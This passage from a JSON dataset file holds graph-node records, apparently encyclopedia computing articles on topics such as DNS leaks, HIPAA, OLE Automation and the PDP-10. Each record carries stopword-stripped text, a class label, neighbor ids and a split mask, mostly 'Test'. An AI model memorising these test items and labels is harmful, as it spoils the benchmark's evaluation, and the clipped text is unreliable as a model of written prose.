    "text": "M2001:m2001 m2001 modular educational mathematical programming language developing presenting mathematical algorithms modern discrete classical continuous mathematics m2001 built semantic framework based category theory syntax similar pascal modula-2 designed purely pedagogic use efficiency ease implementation far less important development generality range application created play important role forming formal algorithmic foundation first-year college math students based multi-layered datatyping scheme m2001 includes collection eight computational types another six structured types two respectively collections mathematical classes abstract classes built latter encompassing commonly used abstract data types computer science lower two layers m2001 typing scheme based earlier experimental called cat programming language modular mathematical programming language ronald e. prather",
    "neighbors": [
      8262,
      219,
      8524,
      6558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8464,
    "label": 4,
    "text": "DNS_leak:dns leak dns leak refers security flaw allows dns requests revealed isp dns servers despite use vpn service attempt conceal although primary concern vpn users also possible prevent proxy direct internet users vulnerability allows isp well on-path eavesdroppers see websites user may visiting possible browser dns requests sent isp dns server directly sent vpn occurs certain types vpns e.g split-tunnel vpns traffic still sent local network interface even vpn active starting windows 8 microsoft introduced smart multi-homed named resolution altered way windows 8 handled dns requests ensuring dns request could travel across available network interfaces computer general consensus new method domain name resolution accelerated time required dns look-up completed also exposed vpn users dns leaks connected vpn endpoint computer would longer use dns servers assigned vpn service instead dns request would sent available interfaces thus dns traffic would travel vpn tunnel expose user default dns servers websites exist allow testing determine whether dns leak occurring dns leaks addressed number ways websites may report false positive test results advisable always check result manually making sure note country provider ip home isp something different foreign may always easy know whether one using set dns whether dns leaks safest way verify via one online dns leak tests sometimes isp may already using one public dns servers default setting public one may show difference servers isp may collecting data case safest change different dns test dns leaks example isp using google public dns using may wise try cloudflare dns see leaks google dns",
    "neighbors": [
      8998,
      8413,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8465,
    "label": 4,
    "text": "Jungle_Disk:jungle disk jungle disk name online backup software service privately held data security company suite products also includes network protection service email archiving one first backup services use cloud storage amazon s3 2009 acquired rackspace service added rackspace cloud files name word association amazon rainforest jungle disk common shorthand hard disk drive jungle disk backup monthly subscription software service supports laptops desktops servers microsoft windows macos linux operating systems data backed online disk using either continuous backup aka sync scheduled back selected files folders everything system data accessed software client web browser mobile devices running android ios also provides webdav server integration applications customers protect data using aes-256 encryption key even jungle disk employees access records subscription includes 10 gigabytes storage pay-as-you-go additional data jungle disk founded atlanta dave wright 2006 october 22 2008 jungle disk entered agreement acquired rackspace hosting inc. rackspace purchased jungle disk order expand cloud hosting services acquisition integration dave left rackspace found solidfire jungle disk relocated san antonio 2010 pace development slowed rackspace focused cloud infrastructure software platform became openstack 2013 rackspace revived jungle disk customer support going ticket service include phone chat ticketing january 5 2016 jungle disk spun rackspace us inc. privately held company headquartered san antonio tx december 5 2017 jungle disk announced acquired safetynet first backup quickbooks online jobber march 6 2018 jungle disk announced acquired teampassword password manager connected teams simplify password management security addition teampassword jungle disk product portfolio gives small businesses data security tool help generate secure unique passwords share access applications services enabling users productive work collaboration jungle disk raised 11 million equity 2016 part spin-off rackspace investors include number san antonio family offices january 18th 2017 jungle disk announced tripled growth capital additional funding existing investors december 7 2016 jungle disk tech-onomic impact award 2016 tech titans awards presented san antonio business journal january 31 2017 jungle disk named one ten finalists 'the best cloud storage file sharing providers businesses 2017 pc magazine march 2017 jungle disk named 'top 10 cloud storage solution provider cloud technology insights may 23 2017 jungle disk named one five finalists 'best cloud backup services businesses pc magazine tied second scoring affordable price large margin may 11 2018 jungle disk named one lifewire list 21 online backup services jungle disk client software receive update 2012-2014 part cloud office portfolio new version released december 2015 june 3 2011 colin percival owner tarsnap competitor jungle disk identified two potential weaknesses jungle disk security",
    "neighbors": [
      11201,
      4194,
      6565,
      939,
      3819,
      3629,
      6797,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8466,
    "label": 4,
    "text": "Application_virtualization:application virtualization application virtualization also known process virtualization software technology encapsulates computer programs underlying operating system executed fully virtualized application installed traditional sense although still executed application behaves runtime like directly interfacing original operating system resources managed isolated sandboxed varying degrees context term virtualization refers artifact encapsulated application quite different meaning hardware virtualization refers artifact abstracted physical hardware full application virtualization requires virtualization layer application virtualization layers replace part runtime environment normally provided operating system layer intercepts disk operations virtualized applications transparently redirects virtualized location often single file application remains unaware accesses virtual resource instead physical one since application working one file instead many files spread throughout system becomes easy run application different computer previously incompatible applications run side-by-side examples technology windows platform include application virtualization allows applications run environments suit native application example wine allows microsoft windows applications run linux application virtualization reduces system integration administration costs maintaining common software baseline across multiple diverse computers organization lesser integration protects operating system applications poorly written buggy code cases provides memory protection ide-style debugging features may even run applications written correctly example applications try store user data read-only system-owned location feature assists implementation principle least privilege removing requirement end-users administrative privileges order run poorly written applications allows incompatible applications run side-by-side time minimal regression testing one another isolating applications operating system security benefits well exposure application automatically entail exposure entire os application virtualization also enables simplified operating system migrations applications transferred removable media computers without need installing becoming portable software application virtualization uses fewer resources separate virtual machine computer programs virtualized examples include applications require device driver form integration os 16-bit applications need run shared memory space anti-virus programs applications require heavy os integration windowblinds stylexp difficult virtualize moreover software licensing application virtualization bears great licensing pitfalls mainly application virtualization software virtualized applications must correctly licensed application virtualization address file registry-level compatibility issues legacy applications newer operating systems applications n't manage heap correctly execute windows vista still allocate memory way regardless whether virtualized reason specialist application compatibility fixes shims may still needed even application virtualized technology categories fall application virtualization include",
    "neighbors": [
      5378,
      6150,
      3082,
      7947,
      6797,
      4238,
      3484,
      5411,
      2212,
      6438,
      295,
      10537,
      10284,
      7983,
      7349,
      7733,
      823,
      9655,
      5049,
      10747,
      8123,
      2236,
      318,
      8255,
      5697,
      5702,
      7507,
      10835,
      4309,
      2910,
      1632,
      1513,
      3822,
      8439,
      1400,
      5371
    ],
    "mask": "Test"
  },
  {
    "node_id": 8467,
    "label": 2,
    "text": "Check_Point_IPSO:check point ipso check point ipso operating system 'check point firewall appliance security devices based freebsd numerous hardening features applied ip ipso refers ipsilon networks company specialising ip switching acquired nokia 1997 2009 check point acquired nokia security appliance business including ipso nokia ipso version 6.2 fork freebsd 6 two systems called ipso-sx ipso-lx linux-based check point offers three lines security appliances one based ipso 6.x one based operating system called secureplatform latest based gaia platform rhel4 based ipso notable features firsts include ipso sb originally derived ipsilon networks freebsd 2.1-stable cross-compiled freebsd 2.2.6-release 3.5-release platforms major components ipso versions 2.x sold ipsilon networks part atm tag-switching solutions originally pioneered ipso 3.0 onwards designed host check point firewall-1 third party packages ipso 3.0 3.9 spanned 1999 2005 adding many features significant performance hardware refinements recognizably administrator ipso 4.0 designed major update internally numbered ipso 3.10 however check point software unable process two-digit dot version also included refresh voyager html interface point javascript frames avoided order facilitate use lynx command line interface together resulted renumbered 4.0 ipso 4.1 ipso 4.2 incremental releases ipso 4.2 gain source-based routing last scheduled new feature new development continue ipso 6.x ipso 5.0 build 056 released 2009 vsx r65 support ip appliance ipso 6.0 announced nokia relation ip2450 ip690 hardware based freebsd 6.x primary advantage ipso 4.x improved memory management performance scheduling threading posix-compliance operating system features ipso 6.0.7 released 2009 ip690 ip2450 corexl multi-core support ipso 6.1 contains enhancements freebsd 6.x without corexl support step change nokia advertised ipso 4.2 6.07 6.1 run alongside period time check point acquired nokia ip appliance business 6.07 6.1 development branches merged combined 6.2 recent version ipso 6.2mr6 released february 2017 nokia offered ipso 7 actually ipso lx discontinued 7.2 2008 acquiring nokia ip appliance business check point announced project gaia combine ipso secure platform first release expected 2011",
    "neighbors": [
      6657,
      9764,
      3462,
      998,
      5096,
      9452,
      3885,
      7983,
      8668,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 8468,
    "label": 4,
    "text": "Loren_Kohnfelder:loren kohnfelder loren kohnfelder best known mit s.b bscse thesis written may 1978 describing practical means applying public key cryptography secure network communications kohnfelder thesis introduced terms 'certificate 'certificate revocation list well introducing numerous concepts established important parts public key infrastructure x.509 certificate specification provides basis ssl s/mime modern pki implementations based kohnfelder thesis also co-creator praerit garg stride model security threats widely used threat modeling",
    "neighbors": [
      513,
      483,
      10831,
      9744,
      1297,
      5372
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8469,
    "label": 4,
    "text": "The_Coroner's_Toolkit:coroner toolkit coroner toolkit tct suite free computer security programs dan farmer wietse venema digital forensic analysis suite runs several unix-related operating systems freebsd openbsd bsd/os sunos/solaris linux hp-ux tct released terms ibm public license parts tct used aid analysis data recovery computer disasters tct superseded sleuth kit although tsk partially based tct authors tct accepted official successor tct",
    "neighbors": [
      5506,
      2437,
      1801,
      5397,
      1304,
      7968,
      5284,
      11182,
      7983,
      4789,
      823,
      2747,
      8635,
      2494,
      830,
      10436,
      6475,
      4049,
      4834,
      5475,
      3172,
      7525,
      9319,
      5492,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8470,
    "label": 8,
    "text": "Unica_NetTracker:unica nettracker unica nettracker web analytics application processes web log files unica nettracker first released 1996 sane solutions sold unica corporation current version december 2006 7.1.0 unica announce end-of-life end-of-support december 31 2011 nettracker processes log files virtually format using custom log definition logs processed web servers proxy servers streaming media servers ftp servers well processing log files nettracker use page tag data augment log file data nettracker stores processed log files internal database based upon sqlite",
    "neighbors": [
      4640,
      8448,
      6576,
      119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8471,
    "label": 4,
    "text": "Health_Insurance_Portability_and_Accountability_Act:health insurance portability accountability act health insurance portability accountability act 1996 hipaa kennedy–kassebaum act ref name= atchinson/fox /ref enacted 104th united states congress signed president bill clinton 1996 created primarily modernize flow healthcare information stipulate personally identifiable information maintained healthcare healthcare insurance industries protected fraud theft address limitations healthcare insurance coverage act consists five titles title hipaa protects health insurance coverage workers families change lose jobs title ii hipaa known administrative simplification provisions requires establishment national standards electronic health care transactions national identifiers providers health insurance plans employers title iii sets guidelines pre-tax medical spending accounts title iv sets guidelines group health plans title v governs company-owned life insurance policies five sections act known titles title hipaa regulates availability breadth group health plans certain individual health insurance policies amended employee retirement income security act public health service act internal revenue code title requires coverage also limits restrictions group health plan place benefits preexisting conditions group health plans may refuse provide benefits relation preexisting conditions either 12 months following enrollment plan 18 months case late enrollment title allows individuals reduce exclusion period amount time creditable coverage enrolling plan significant breaks coverage creditable coverage defined quite broadly includes nearly group individual health plans medicare medicaid significant break coverage defined 63-day period without creditable coverage along exception allowing employers tie premiums co-payments tobacco use body mass index title also requires insurers issue policies without exclusion leaving group health plans creditable coverage see exceeding 18 months renew individual policies long offered provide alternatives discontinued plans long insurer stays market without exclusion regardless health condition health care plans exempted title requirements long-term health plans limited-scope plans like dental vision plans offered separately general health plan however benefits part general health plan hipaa still applies benefits example new plan offers dental benefits must count creditable continuous coverage old health plan towards exclusion periods dental benefits alternate method calculating creditable continuous coverage available health plan title 5 categories health coverage considered separately including dental vision coverage anything 5 categories must use general calculation e.g. beneficiary may counted 18 months general coverage 6 months dental coverage beneficiary general health plan covered dental 6 months prior application date since limited-coverage plans exempt hipaa requirements odd case exists applicant general group health plan obtain certificates creditable continuous coverage independent limited-scope plans dental apply towards exclusion periods new plan include coverages hidden exclusion periods valid title e.g. accident covered must occurred beneficiary covered exact health insurance contract clauses must acted upon health plan also must re-written comply hipaa title ii hipaa establishes policies procedures maintaining privacy security individually identifiable health information outlines numerous offenses relating health care establishes civil criminal penalties violations also creates several programs control fraud abuse within health-care system however significant provisions title ii administrative simplification rules title ii requires department health human services hhs increase efficiency health-care system creating standards use dissemination health-care information rules apply covered entities defined hipaa hhs covered entities include health plans health care clearinghouses billing services community health information systems health care providers transmit health care data way regulated hipaa per requirements title ii hhs promulgated five rules regarding administrative simplification privacy rule transactions code sets rule security rule unique identifiers rule enforcement rule hipaa privacy rule composed national regulations use disclosure protected health information phi healthcare treatment payment operations covered entities effective compliance date privacy rule april 14 2003 one-year extension certain small plans hipaa privacy rule regulates use disclosure protected health information phi held covered entities generally health care clearinghouses employer-sponsored health plans health insurers medical service providers engage certain transactions regulation hhs extended hipaa privacy rule independent contractors covered entities fit within definition business associates phi information held covered entity regarding health status provision health care health care payment linked individual interpreted rather broadly includes part individual medical record payment history covered entities must disclose phi individual within 30 days upon request also must disclose phi required law reporting suspected child abuse state child welfare agencies covered entities may disclose protected health information law enforcement officials law enforcement purposes required law including court orders court-ordered warrants subpoenas administrative requests identify locate suspect fugitive material witness missing person covered entity may disclose phi certain parties facilitate treatment payment health care operations without patient express written authorization disclosures phi require covered entity obtain written authorization individual disclosure case covered entity discloses phi must make reasonable effort disclose minimum necessary information required achieve purpose privacy rule gives individuals right request covered entity correct inaccurate phi also requires covered entities take reasonable steps ensuring confidentiality communications individuals example individual ask called work number instead home cell phone numbers privacy rule requires covered entities notify individuals uses phi covered entities must also keep track disclosures phi document privacy policies procedures must appoint privacy official contact person responsible receiving complaints train members workforce procedures regarding phi individual believes privacy rule upheld file complaint department health human services office civil rights ocr however according wall street journal ocr long backlog ignores complaints complaints privacy violations piling department health human services april 2003 november 2006 agency fielded 23,886 complaints related medical-privacy rules yet taken enforcement actions hospitals doctors insurers anyone else rule violations spokesman agency says closed three-quarters complaints typically found violation provided informal guidance parties involved however july 2011 ucla agreed pay 865,500 settlement regarding potential hipaa violations hhs office civil rights investigation showed 2005 2008 unauthorized employees repeatedly without legitimate cause looked electronic protected health information numerous uclahs patients january 2013 hipaa updated via final omnibus rule updates included changes security rule breach notification portions hitech act significant changes related expansion requirements include business associates covered entities originally held uphold sections law addition definition significant harm individual analysis breach updated provide scrutiny covered entities intent disclosing breaches previously unreported previously organization needed proof harm occurred whereas organizations must prove harm occurred protection phi changed indefinite 50 years death severe penalties violation phi privacy requirements also approved hipaa privacy rule may waived natural disaster case hurricane harvey 2017 see privacy section health information technology economic clinical health act hitech act privacy rule requires medical providers give individuals access phi individual requests information writing typically using provider form purpose provider 30 days provide copy information individual individual may request information electronic form hard-copy provider obligated attempt conform requested format providers using electronic health record ehr system certified using cehrt certified electronic health record technology criteria individuals must allowed obtain phi electronic form providers encouraged provide information expediently especially case electronic record requests individuals right access health-related information including health condition treatment plan notes images lab results billing information explicitly excluded private psychotherapy notes provider information gathered provider defend lawsuit providers charge reasonable amount relates cost providing copy however charge allowable providing data electronically certified ehr using view download transfer feature required certification delivered individual electronic form individual may authorize delivery using either encrypted un-encrypted email delivery using media usb drive cd etc. may involve charge direct messaging secure email technology common use healthcare industry possibly methods using un-encrypted email individual must understand accept risks privacy using technology information may intercepted examined others regardless delivery technology provider must continue fully secure phi system deny delivery method poses additional risk phi system individual may also request writing phi delivered designated third party family care provider individual may also request writing provider send phi designated service used collect manage records personal health record application example patient request writing ob-gyn provider digitally transmit records latest pre-natal visit pregnancy self-care app mobile phone according interpretations hipaa hospitals reveal information phone relatives admitted patients instances impeded location missing persons asiana airlines flight 214 san francisco crash hospitals reluctant disclose identities passengers treating making difficult asiana relatives locate one instance man washington state unable obtain information injured mother janlori goldman director advocacy group health privacy project said hospitals overcautious misapplying law times reports suburban hospital bethesda md. interpreted federal regulation requires hospitals allow patients opt included hospital directory meaning patients want kept directory unless specifically say otherwise result patient unconscious otherwise unable choose included directory relatives friends might able find goldman said hipaa intended make health care system united states efficient standardizing health care transactions hipaa added new part c titled administrative simplification title xi social security act supposed simplify healthcare transactions requiring health plans engage health care transactions standardized way hipaa/edi provision scheduled take effect october 16 2003 one-year extension certain small plans however due widespread confusion difficulty implementing rule cms granted one-year extension parties january 1 2012 newer versions asc x12 005010 ncpdp d.0 become effective replacing previous asc x12 004010 ncpdp 5.1 mandate asc x12 005010 version provides mechanism allowing use icd-10-cm well improvements july 1 2005 medical providers file electronically file electronic claims using hipaa standards order paid hipaa hipaa-covered health plans required use standardized hipaa electronic transactions see 42 usc § 1320d-2 45 cfr part 162 information found final rule hipaa electronic transaction standards 74 fed reg 3296 published federal register january 16 2009 cms website key edi x12 transactions used hipaa compliance edi health care claim transaction set 837 used submit health care claim billing information encounter information except retail pharmacy claims see edi retail pharmacy claim transaction sent providers health care services payers either directly via intermediary billers claims clearinghouses also used transmit health care claims billing payment information payers different payment responsibilities coordination benefits required payers regulatory agencies monitor rendering billing and/or payment health care services within specific health care/insurance industry segment example state mental health agency may mandate healthcare claims providers health plans trade professional medical health care claims electronically must use 837 health care claim professional standard send claims many different business applications health care claim slight derivations cover claims involving unique claims institutions professionals chiropractors dentists etc edi retail pharmacy claim transaction ncpdp telecommunications standard version 5.1 used submit retail pharmacy claims payers health care professionals dispense medications either directly via intermediary billers claims clearinghouses also used transmit claims retail pharmacy services billing payment information payers different payment responsibilities coordination benefits required payers regulatory agencies monitor rendering billing and/or payment retail pharmacy services within pharmacy health care/insurance industry segment edi health care claim payment/advice transaction set 835 used make payment send explanation benefits eob send explanation payments eop remittance advice make payment send eop remittance advice health insurer health care provider either directly via financial institution edi benefit enrollment maintenance set 834 used employers unions government agencies associations insurance agencies enroll members payer payer healthcare organization pays claims administers insurance benefit product examples payers include insurance company healthcare professional hmo preferred provider organization ppo government agency medicaid medicare etc organization may contracted one former groups edi payroll deducted another group premium payment insurance products 820 transaction set making premium payment insurance products used order financial institution make payment payee edi health care eligibility/benefit inquiry 270 used inquire health care benefits eligibility associated subscriber dependent edi health care eligibility/benefit response 271 used respond request inquiry health care benefits eligibility associated subscriber dependent edi health care claim status request 276 transaction set used provider recipient health care products services authorized agent request status health care claim edi health care claim status notification 277 transaction set used healthcare payer authorized agent notify provider recipient authorized agent regarding status health care claim encounter request additional information provider regarding health care claim encounter transaction set intended replace health care claim payment/advice transaction set 835 therefore used account payment posting notification summary service line detail level notification may solicited unsolicited edi health care service review information 278 transaction set used transmit health care service information subscriber patient demographic diagnosis treatment data purpose request review certification notification reporting outcome health care services review edi functional acknowledgement transaction set 997 transaction set used define control structures set acknowledgments indicate results syntactical analysis electronically encoded documents although specifically named hipaa legislation final rule necessary x12 transaction set processing encoded documents transaction sets grouped functional groups used defining transactions business data interchange standard cover semantic meaning information encoded transaction sets final rule security standards issued february 20 2003 took effect april 21 2003 compliance date april 21 2005 covered entities april 21 2006 small plans security rule complements privacy rule privacy rule pertains protected health information phi including paper electronic security rule deals specifically electronic protected health information ephi lays three types security safeguards required compliance administrative physical technical types rule identifies various security standards standard names required addressable implementation specifications required specifications must adopted administered dictated rule addressable specifications flexible individual covered entities evaluate situation determine best way implement addressable specifications privacy advocates argued flexibility may provide much latitude covered entities software tools developed assist covered entities risk analysis remediation tracking standards specifications follows hipaa covered entities providers completing electronic transactions healthcare clearinghouses large health plans must use national provider identifier npi identify covered healthcare providers standard transactions may 23 2007 small health plans must use npi may 23 2008 effective may 2006 may 2007 small health plans covered entities using electronic communications e.g. physicians hospitals health insurance companies forth must use single new npi npi replaces identifiers used health plans medicare medicaid government programs however npi replace provider dea number state license number tax identification number npi 10 digits may alphanumeric last digit checksum npi contain embedded intelligence words npi simply number additional meaning npi unique national never re-used except institutions provider usually one institution may obtain multiple npis different sub-parts free-standing cancer center rehab facility february 16 2006 hhs issued final rule regarding hipaa enforcement became effective march 16 2006 enforcement rule sets civil money penalties violating hipaa rules establishes procedures investigations hearings hipaa violations many years prosecutions violations march 2013 u.s. dept health human services hhs investigated 19,306 cases resolved requiring changes privacy practice corrective action noncompliance determined hhs entities must apply corrective measures complaints investigated many different types businesses national pharmacy chains major health care centers insurance groups hospital chains small providers 9,146 cases hhs investigation found hipaa followed correctly 44,118 cases hhs find eligible cause enforcement example violation started hipaa started cases withdrawn pursuer activity actually violate rules according hhs website following lists issues reported according frequency common entities required take corrective action voluntary compliance according hhs listed frequency title iii standardizes amount may saved per person pre-tax medical savings account beginning 1997 medical savings account msa available employees covered employer-sponsored high deductible plan small employer self-employed individuals title iv specifies conditions group health plans regarding coverage persons pre-existing conditions modifies continuation coverage requirements also clarifies continuation coverage requirements includes cobra clarification title v includes provisions related company-owned life insurance employers providing company-owned life insurance premiums prohibiting tax-deduction interest life insurance loans company endowments contracts related company also repeals financial institution rule interest allocation rules finally amends provisions law relating people give united states citizenship permanent residence expanding expatriation tax assessed deemed giving u.s. status tax reasons making ex-citizens names part public record creation quarterly publication individuals chosen expatriate enactment privacy security rules caused major changes way physicians medical centers operate complex legalities potentially stiff penalties associated hipaa well increase paperwork cost implementation causes concern among physicians medical centers august 2006 article journal annals internal medicine detailed concerns implementation effects hipaa hipaa restrictions researchers affected ability perform retrospective chart-based research well ability prospectively evaluate patients contacting follow-up study university michigan demonstrated implementation hipaa privacy rule resulted drop 96 34 proportion follow-up surveys completed study patients followed heart attack another study detailing effects hipaa recruitment study cancer prevention demonstrated hipaa-mandated changes led 73 decrease patient accrual tripling time spent recruiting patients tripling mean recruitment costs addition informed consent forms research studies required include extensive detail participant protected health information kept private information important addition lengthy legalistic section privacy may make already complex documents even less user-friendly patients asked read sign data suggest hipaa privacy rule currently implemented may negative impacts cost quality medical research dr. kim eagle professor internal medicine university michigan quoted annals article saying privacy important research also important improving care hope figure right complexity hipaa combined potentially stiff penalties violators lead physicians medical centers withhold information may right review implementation hipaa privacy rule u.s. government accountability office found health care providers uncertain legal privacy responsibilities often responded overly guarded approach disclosing information ... necessary ensure compliance privacy rule reports uncertainty continue period immediately prior enactment hipaa privacy security acts medical centers medical practices charged getting compliance early emphasis potentially severe penalties associated violation many practices centers turned private for-profit hipaa consultants intimately familiar details legislation offered services ensure physicians medical centers fully compliance addition costs developing revamping systems practices increase paperwork staff time necessary meet legal requirements hipaa may impact finances medical centers practices time insurance companies medicare reimbursement also declining education training healthcare providers paramount correct implementation hipaa privacy security acts effective training must describe statutory regulatory background purpose hipaa general summary principles key provisions privacy rule.although hipaa training course tailored towards roles employees attending course vital elements included although hipaa fits 1996 public law 104-191 health insurance portability accountability act references title ii privacy rule often stated health information privacy portability act hippa usa federal state county government sectors governmental agencies issued corrective followups regarding hippa hipaa according us department health human services office civil rights april 2003 january 2013 received 91,000 complaints hipaa violations 22,000 led enforcement actions varying kinds settlements fines 521 led referrals us department justice criminal actions examples significant breaches protected information hipaa violations include according koczkodaj et al. 2018 total number individuals affected since october 2009 173,398,820 differences civil criminal penalties summarized following table",
    "neighbors": [
      2818,
      8455,
      4232,
      8968,
      4234,
      5002,
      5007,
      7568,
      3858,
      5404,
      3366,
      8742,
      9129,
      11567,
      7729,
      8881,
      9396,
      6327,
      7863,
      10938,
      6588,
      3773,
      11070,
      9675,
      1612,
      3925,
      8022,
      1239,
      2779,
      2656,
      3552,
      1251,
      6372,
      11368,
      2932,
      5373,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 8472,
    "label": 2,
    "text": "Nokia_E71:nokia e71 nokia e71 smartphone introduced may 2008 eseries range qwerty keyboard targeting business users worldwide runs symbian os v9.2 series 60 3rd edition second generation feature pack 1 nokia e71 succeeded nokia e61/61i models building base design form factor enhancing feature set nokia e71 well received highly popular often considered one nokia finest devices superseded nokia e72 2009 primary 3.15 mp 2048x1536 pixels autofocus led flash video qvga 15fps secondary videocall camera pre-installed several open source developers well paid third party developers created software various functions utilities car headsets power colors grey steel white red black e71 currently sold mainland china wi-fi 802.11b/g wlan networking back mounted camera 3g also excluded licenses 3g mainland china approved early 2009 reduction price phones lacking features firmware update bring back hardware missing e71 sold macau hong kong lack features software bundled chinese version slightly different also qq client along chinese specific programs e71 received highly positive critical reception widely praised battery life software features like push email slim design hardware including keyboard trusted reviews reviewer gave 5 stars 5 cnet uk wrote n't like camera think rest pretty close perfect techradar called terrific device well thought package listing lack 3.5 mm headphone jack disadvantage publications dubbed blackberry killer iphone killer",
    "neighbors": [
      1537,
      4609,
      8577,
      9732,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      11545,
      2208,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9163,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 8473,
    "label": 2,
    "text": "OLE_Automation:ole automation microsoft windows applications programming ole automation later renamed simply automation inter-process communication mechanism created microsoft based subset component object model com intended use scripting languages – originally visual basic – used several languages windows automation objects required implement idispatch interface provides infrastructure whereby applications called automation controllers access manipulate i.e set properties call methods shared automation objects exported applications supersedes dynamic data exchange dde older mechanism applications control one another dde ole automation automation controller client application exporting automation objects server contrary name automation objects necessarily use microsoft ole although automation objects used ole environments confusion roots microsoft earlier definition ole previously less synonym com ensure interoperability automation interfaces limited use subset com types specifically automation interfaces must use safearray instead raw com arrays automation-compatible com servers however rely in-built ole marshalling implementation avoids need additional proxy/stub projects marshalling out-of-process automation designed ease scripting mind controllers often provide languages visual basic applications end users allowing control automation objects via scripts automation objects often written conventional languages c++ c++ attributes used simplify development languages visual basic borland delphi also provides convenient syntax automation hides complexity underlying implementation order automate application developer automation controller must know object model employed target application exporting activation objects requires developer target application publicly document object model development automation controllers without knowledge target application object model difficult impossible complications automation components usually provided type libraries contain metadata classes interfaces features exposed object library interfaces described microsoft interface definition language type libraries viewed using various tools microsoft ole/com object viewer codice_1 part microsoft platform sdk object browser visual basic version 6 visual studio .net type libraries used generate proxy pattern/stub code interoperating com platforms microsoft .net java instance .net framework sdk includes tools generate proxy .net dll access automation objects using early binding information interfaces extracted type library late binding via idispatch mapped .net reflection api built-in .net-to-com bridge called com interop java lacks built-in com support toolsets like jacob jsegue generate proxy source code consisting two parts set java classes c++ source java native interface dll type libraries solutions work windows another java based j-interop library enables interoperability com components without jni using dcom wire protocol msrpc works non-windows platforms also microsoft publicly documented object model applications microsoft office software developers also documented object models applications object models presented automation controllers type libraries interfaces described odl automation available variety languages including limited",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      5677,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      2644,
      9813,
      10839,
      603,
      9819,
      2146,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      10879,
      5765,
      8841,
      1676,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      692,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      9943,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      242,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      1856,
      3394,
      847,
      3922,
      4439,
      5465,
      2402,
      6500,
      2919,
      4458,
      6506,
      8554,
      9066,
      9593,
      2943,
      1407,
      3462,
      8582,
      1418,
      5003,
      5004,
      8080,
      3481,
      11677,
      10654,
      8607,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      8644,
      6088,
      969,
      3535,
      8659,
      2519,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8474,
    "label": 3,
    "text": "PDP-10:pdp-10 digital equipment corporation pdp-10 later marketed decsystem-10 mainframe computer family manufactured beginning 1966 discontinued 1983 1970s models beyond marketed decsystem-10 name especially tops-10 operating system became widely used pdp-10 architecture almost identical dec earlier pdp-6 sharing 36-bit word length slightly extending instruction set improved hardware implementation aspects instruction set unusual notably byte instructions operated bit fields size 1 36 bits inclusive according general definition byte contiguous sequence fixed number bits pdp-10 machine made time-sharing common features made common fixture many university computing facilities research labs 1970s notable harvard university aiken lab mit ai lab project mac stanford sail computer center corporation ccc eth zir carnegie mellon university main operating systems tops-10 tenex used build early arpanet reasons pdp-10 looms large early hacker folklore projects extend pdp-10 line eclipsed success unrelated vax superminicomputer cancellation pdp-10 line announced 1983 original pdp-10 processor ka10 introduced 1968 uses discrete transistors packaged dec flip-chip technology backplanes wire wrapped via semi-automated manufacturing process cycle time 1 μs add time 2.1 μs 1973 ka10 replaced ki10 uses transistor–transistor logic ttl ssi joined 1975 higher-performance kl10 later faster variants built emitter-coupled logic ecl microprogrammed cache memory kl10 performance 1 megaflops using 36-bit floating point numbers matrix row reduction slightly faster newer vax-11/750 although limited memory smaller less expensive model ks10 introduced 1978 using ttl am2901 bit-slice components including pdp-11 unibus connect peripherals ks marketed decsystem-2020 dec entry distributed processing arena introduced world lowest cost mainframe computer system ka10 maximum main memory capacity virtual physical 256 kilowords equivalent 1152 kilobytes supplied dec include paging hardware memory management consisted two sets protection relocation registers called base bounds registers allows half user address space limited set section main memory designated base physical address size allows model separate read-only shareable code segment normally high segment read-write data/stack segment normally low segment used tops-10 later adopted unix ka10 machines first mit later bolt beranek newman bbn modified add virtual memory support demand paging ka10 weighed 10/50 top-of-the-line uni-processor ka machine time pa1050 software package introduced two ka10 models uniprocessor 10/40 dual-processor 10/55 ki10 later processors offer paged memory management also support larger physical address space 4 megawords ki10 models include 1060 1070 1077 latter incorporating two cpus original kl10 pdp-10 also marketed decsystem-10 models 1080 1088 etc use original pdp-10 memory bus external memory modules module context meant cabinet dimensions roughly wxhxd 30 x 75 x 30 capacity 32 256 kwords magnetic core memory picture right hand side introduction shows six cabinets processors used decsystem-20 2040 2050 2060 2065 commonly incorrectly called kl20 use internal memory mounted cabinet cpu 10xx models also different packaging come original tall pdp-10 cabinets rather short ones used later decsystem-20 differences 10xx 20xx models cosmetic real 10xx systems 20-style internal memory i/o 20xx systems 10-style external memory i/o bus particular arpanet tops-20 systems i/o bus an20 imp interface i/o bus device could run either tops-10 tops-20 microcode thus corresponding operating system later model b version 2060 